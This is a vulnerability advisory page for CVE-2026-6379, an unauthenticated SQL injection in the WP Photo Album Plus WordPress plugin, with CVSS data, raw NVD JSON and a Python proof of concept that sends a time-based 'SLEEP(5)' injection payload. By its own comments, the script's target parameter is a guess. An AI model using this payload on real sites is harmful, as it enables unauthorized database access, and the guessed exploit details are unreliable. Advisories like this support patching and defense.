Security Vulnerability Report
中文
CVE-2026-6379 CVSS 8.6 HIGH

CVE-2026-6379

Published: 2026-05-18 07:16:13
Last Modified: 2026-05-18 17:05:46

Description

The WP Photo Album Plus WordPress plugin before 9.1.11.001 does not properly sanitize and escape a parameter before using it in a SQL query, allowing unauthenticated users to perform SQL injection attacks.

CVSS Details

CVSS Score
8.6
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

WP Photo Album Plus < 9.1.11.001

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests def exploit_sqli(target_url): """ Proof of Concept for CVE-2026-6379 Description: Unauthenticated SQL Injection in WP Photo Album Plus < 9.1.11.001 """ # The vulnerable endpoint is often an AJAX endpoint or a direct script in the plugin # This example demonstrates a time-based blind SQL injection attempt injection_point = "wppa-album" # Example parameter name, verify against actual source # Payload to check for time-based delay (SLEEP(5)) # Note: Actual parameter and payload structure depends on the specific vulnerable code line payload = { injection_point: "1' OR SLEEP(5)-- " } headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36" } try: print(f"[*] Sending payload to {target_url}...") response = requests.get(target_url, params=payload, headers=headers, timeout=10) # Check if the response time indicates a successful SQL injection (delay) if response.elapsed.total_seconds() >= 5: print("[+] Potential SQL Injection vulnerability confirmed (Time-based delay detected).") else: print("[-] No significant delay detected. Target might not be vulnerable or payload incorrect.") except requests.exceptions.RequestException as e: print(f"[!] Error occurred: {e}") if __name__ == "__main__": # Replace with the actual target URL target = "http://example.com/wordpress/" exploit_sqli(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-6379", "sourceIdentifier": "[email protected]", "published": "2026-05-18T07:16:12.590", "lastModified": "2026-05-18T17:05:46.240", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The WP Photo Album Plus WordPress plugin before 9.1.11.001 does not properly sanitize and escape a parameter before using it in a SQL query, allowing unauthenticated users to perform SQL injection attacks."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 4.0}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://wpscan.com/vulnerability/60b88fd2-4048-4773-b319-63caaf5bd8eb/", "source": "[email protected]"}]}}